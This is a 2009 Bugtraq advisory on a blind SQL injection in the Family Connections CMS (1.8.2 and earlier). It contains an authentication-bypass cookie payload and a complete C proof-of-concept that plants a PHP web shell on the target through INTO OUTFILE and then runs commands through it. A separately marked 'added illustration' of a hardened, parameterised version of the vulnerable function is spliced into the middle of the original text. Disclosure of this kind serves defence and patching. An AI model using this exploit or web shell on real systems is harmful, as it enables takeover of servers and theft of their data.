Family Connections 1.8.2 Blind SQL Injection (Correct Version)
Date: Fri, 3 Apr 2009 15:35:01 +0200
Subject: Family Connections 1.8.2 Blind SQL Injection (Correct Version)
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>, str0ke <str0ke@milw0rm.com>
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 1 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Blind SQL Injection
[-] File affected: inc/util_inc.php
Usually an SQL injection vulnerability located in the
authentication system allows a guest to bypass it, and
this is just what happens using the following cookies:
Cookie name: fcms_login_id
Cookie content: -1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,'admin','password',12,13,14,15,16,17,18,19,20,21,22
Cookie server: localhost (change it)
Cookie path: /
Cookie name: fcms_login_uname
Cookie content: admin
Cookie server: localhost (change it)
Cookie path: /
Cookie name: fcms_login_pw
Cookie content: password
Cookie server: localhost (change it)
Cookie path: /
Anyway, the values contained in the previous cookies
are also used by other functions and queries, so it
is not possible to browse the vulnerable website
with such permissions, because the CMS interrupts the
session each time a SQL error is encountered.
For this reason the possibility to write the result
of the SQL queries to files is handy to bypass
this limitation.
The following is the vulnerable code:
...
elseif (isset($_COOKIE['fcms_login_id'])) {
    if (isLoggedIn($_COOKIE['fcms_login_id'],
                   $_COOKIE['fcms_login_uname'], $_COOKIE['fcms_login_pw'])) {
        $_SESSION['login_id']    = $_COOKIE['fcms_login_id'];
        $_SESSION['login_uname'] = $_COOKIE['fcms_login_uname'];
        $_SESSION['login_pw']    = $_COOKIE['fcms_login_pw'];
    }
...
in util_inc.php:
function isLoggedIn ($userid, $username, $password) {
    // $userid comes straight from the cookie and is interpolated into the SQL text
    $result = mysql_query("SELECT * FROM `fcms_users` WHERE `id` = $userid LIMIT 1")
        or die('<h1>Login Error (util.inc.php 275)</h1>' . mysql_error());
    if (mysql_num_rows($result) > 0) {
        $r = mysql_fetch_array($result);
        if ($r['username'] !== $username) {
            return false;
        } elseif ($r['password'] !== $password) {
            return false;
        } else {
            return true;
        }
    } else {
        return false;
    }
}
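As an added illustration, not code from the Family Connections project, here is a hardened form of isLoggedIn() that binds the cookie-supplied id as an integer parameter instead of interpolating it into the statement. It assumes a PDO handle `$pdo` (opened with PDO::ERRMODE_EXCEPTION) to the same `fcms_users` table and keeps the original's plaintext password comparison so that only the injection is addressed.

```php
<?php
// Added example (not Family Connections project code): a hardened form of
// isLoggedIn() from inc/util_inc.php. Assumes a PDO handle $pdo opened with
// PDO::ERRMODE_EXCEPTION on the same database; the original plaintext
// password comparison is kept so that only the injection is addressed.
function isLoggedInHardened(PDO $pdo, $userid, $username, $password)
{
    // The original interpolated $userid into the SQL text, so a cookie value
    // such as "-1 UNION ALL SELECT ..." became part of the statement.
    // Rejecting anything but a plain digit string closes that path before
    // the database is consulted at all ($_COOKIE values are strings).
    if (!is_string($userid) || !ctype_digit($userid)) {
        return false;
    }

    $stmt = $pdo->prepare(
        'SELECT `username`, `password` FROM `fcms_users` WHERE `id` = :id LIMIT 1'
    );
    // A bound parameter is sent as a value, never as SQL, whatever it contains.
    $stmt->bindValue(':id', (int) $userid, PDO::PARAM_INT);

    try {
        $stmt->execute();
    } catch (PDOException $e) {
        // Fail closed and log server-side. The original die() echoed
        // mysql_error() to the client, which is exactly the feedback a
        // blind-injection attacker uses to tune a payload.
        error_log('isLoggedIn query failed: ' . $e->getMessage());
        return false;
    }

    $r = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($r === false) {
        return false;
    }
    // Constant-time comparison of the cookie-supplied credentials.
    return hash_equals((string) $r['username'], (string) $username)
        && hash_equals((string) $r['password'], (string) $password);
}
```

The INTO OUTFILE write used in the proof of concept also depends on the application's MySQL account holding the FILE privilege, so revoking that privilege from the web application's database user limits the impact of any similar bug.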
*************************************************
[+] Code
- [A] Blind SQL Injection
/*
Family Connection <= 1.8.2 - Remote Command Execution
Proof of Concept - Written by Salvatore "drosophila" Fresta
The following software will create a file (rce.php) in the
specified path using Blind SQL Injection bug. To exec remote
commands, you must open the file using a browser.
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

int socket_connect(char *server, int port) {
    int fd;
    struct sockaddr_in sock;
    struct hostent *host;

    memset(&sock, 0, sizeof(sock));
    if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    if(!(host = gethostbyname(server))) return -1;
    sock.sin_addr = *((struct in_addr *)host->h_addr);
    if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
    return fd;
}

int socket_send(int socket, char *buffer, size_t size) {
    if(socket < 0) return -1;
    return write(socket, buffer, size) < 0 ? -1 : 0;
}

void usage(char *bn) {
    printf("\n\nFamily Connection <= 1.8.2 - Remote Command Execution\n"
           "Proof of Concept - Written by Salvatore \"drosophila\" Fresta\n\n"
           "usage: %s <server> <path> <fs path>\n"
           "example: %s localhost /fcms/ /var/www/htdocs/fcms/\n\n", bn, bn);
}

int main(int argc, char *argv[]) {
    int sd;
    /* %3b is a URL-encoded ';' so the cookie value survives the HTTP header */
    char code[] = "'<?php echo \"<pre>\"%3b system($_GET[cmd])%3b echo "
                  "\"</pre><br><br>\"%3b?>'",
         *buffer;

    if(argc < 4) {
        usage(argv[0]);
        return -1;
    }
    /* 216 bytes of fixed request text plus the three arguments */
    if(!(buffer = (char *)calloc(216 + strlen(argv[1]) + strlen(argv[2]) + strlen(argv[3]),
                                 sizeof(char)))) {
        perror("calloc");
        return -1;
    }
    sprintf(buffer, "GET %shome.php HTTP/1.1\r\n"
                    "Host: %s\r\n"
                    "Cookie: fcms_login_id=-1 UNION ALL SELECT "
                    "%s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE "
                    "'%srce.php'#\r\n\r\n",
            argv[2], argv[1], code, argv[3]);

    printf("\n[*] Connecting...");
    if((sd = socket_connect(argv[1], 80)) < 0) {
        perror("[-] Connection failed");
        free(buffer);
        return -1;
    }
    printf("\n[+] Connected"
           "\n[*] Sending...");
    if(socket_send(sd, buffer, strlen(buffer)) < 0) {
        perror("[-] Sending failed");
        free(buffer);
        return -1;
    }
    printf("\n[+] Sent\n\n"
           "Open your browser and try to connect to "
           "http://%s%srce.php?cmd=ls\n\n", argv[1], argv[2]);
    recv(sd, buffer, 1, 0);
    close(sd);
    free(buffer);
    printf("[+] Connection closed\n\n");
    return 0;
}
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351